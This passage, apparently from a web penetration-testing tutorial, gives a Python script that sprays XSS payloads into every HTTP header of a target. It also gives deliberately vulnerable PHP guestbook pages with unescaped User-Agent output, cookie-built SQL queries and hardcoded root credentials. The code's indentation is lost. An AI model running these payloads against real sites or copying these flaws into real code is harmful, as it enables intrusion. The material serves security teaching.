Until now, we have focused on sending payloads through URLs and parameters, the two obvious methods of performing attacks. However, there are numerous rich and fertile sources of vulnerabilities that often lay untouched. One of these will be covered in depth in Chapter 6, Image Analysis and Manipulation, for which we can give an intro now. Logs are often kept of specific headers of users that are accessing web pages. It can be a worthwhile activity performing checks against these logs by performing XSS attacks in headers.
We will be creating a script that submits XSS attack strings to all available headers and cycles through several possible XSS attacks. We will provide a short list of payloads, grab all the headers, and submit them sequentially.
Identify the URL that you wish to test. See the end of this example for a PHP web page that the script can be used against in order to test the validity of the scripts.
Once you've identified your target web page, pass it to the script as a command line argument. Your script should be the same as shown in the following script:
import requests
import sys
url = sys.argv[1]
payloads = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
headers ={}
r = requests.head(url)
for payload in payloads:
for header in r.headers:
headers[header] = payload
req = requests.post(url, headers=headers)The script won't provide any output as it targets the admin side of functionality. However, you could set it to provide an output on each loop easily with:
Print "Submitted "+payload
This would return the following every time:
Submitted <script>alert(1);</script>
We import the libraries that we require for this script and take input in the form of a sys.argv function. You should be fairly en fait with this at this point.
Once again, we can declare our payloads as a list, rather than a dictionary, as we are going to pair them with values provided by the web page. We also create an empty dictionary to house our future attack pairings:
payloads = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
headers ={}We then make a HEAD request to web page to return only the headers from the page we are attacking. It's possible, though unlikely, that HEAD requests may be disabled; however, if it is, we can replace this with a standard GET request:
r = requests.head(url)
We loop through the payloads that we set up earlier and the headers we pulled from the preceding HEAD request:
for payload in payloads: for header in r.headers:
For each payload and header, we add them to the empty dictionary that we set up earlier, as pairs:
headers[header] = payload
For each iteration of the payloads, we then submit all the headers with that payload as we obviously can't submit multiple of each header:
req = requests.post(url, headers=headers)
Because the active part of the attack occurs on the client side of the admin, either an admin account needs to be utilized to check manually or an admin needs to be contacted to see if the attack is activated anywhere in the logging chain.
The following is a setup than can be used to test the preceding script. This is very similar to the earlier script for XSS checking. The difference here is that the conventional XSS methods will fail due to the strip_tags function. It demonstrates the situations where unconventional methods are required to perform attacks. Obviously, returning the user-agent in a comment is contrived, though this is something that is frequent in the wild. They need to be saved as the filenames provided to work and in conjunction with a MySQL database to store the comments.
The following is the first interface page named guestbook.php:
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid4'])){
setcookie("sessionid4", $my_rand, "10000000000", "/xss/vhard/");
}
?>
<form id="contact_form" action='addguestbook.php' method="post">
<label>Name: <input class="textfield" name="name" type="text" value="" /></label>
<label>Comment: <input class="textfield" name="comment" type="text" value="" /></label>
<input type="submit" name="Submit" value="Submit"/>
</form>
<strong><a href="viewguestbook.php">View Guestbook</a></strong>The following script is addguestbook.php, which places your comment in the database:
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid4'])){
setcookie("sessionid4", $my_rand, "10000000000", "/xss/vhard/");
}
$host='localhost';
$username='root';
$password='password';
$db_name="xss";
$tbl_name="guestbook";
$cookie = $_COOKIE['sessionid4'];
$unsanname = $_REQUEST['name'];
$unsan = $_REQUEST['comment'];
$comment = addslashes($unsan);
$name = addslashes($unsanname);
#echo "$comment";
mysql_connect($host, $username, $password) or die("Cannot contact server");
mysql_select_db($db_name)or die("Cannot find DB");
$sql="INSERT INTO $tbl_name VALUES('0','$name', '$comment', '$cookie')";
$result=mysql_query($sql);
if($result){
echo "Successful";
echo "<BR>";
echo "<a href='viewguestbook.php'>View Guestbook</a>";
}
else{
echo "ERROR";
}
mysql_close();
?>The final script is viewguestbook.php, which draws the comments from the database:
<?php
$my_rand = rand();
if (!isset($_COOKIE['sessionid4'])){
setcookie("sessionid4", $my_rand, "10000000000", "/xss/vhard/");
}
$host='localhost';
$username='root';
$password='password';
$db_name="xss";
$tbl_name="guestbook";
$cookie = $_COOKIE['sessionid4'];
$name = $_REQUEST['name'];
$comment = $_REQUEST['comment'];
mysql_connect($host, $username, $password) or die("Cannot contact server");
mysql_select_db($db_name)or die("Cannot find DB");
$sql="SELECT * FROM guestbook WHERE session = '$cookie'";
$result=mysql_query($sql);
echo "<h1>Comments</h1>
";
while($field = mysql_fetch_assoc($result)) {
$trimmedname = strip_tags($field['name']);
$trimmedcomment = strip_tags($field['comment']);
echo "<a>Name: " . $trimmedname . " ";
echo "Comment: " . $trimmedcomment . "</a><BR>
";
}
echo "<!--" . $_SERVER['HTTP_USER_AGENT'] . "-->";
mysql_close();
?>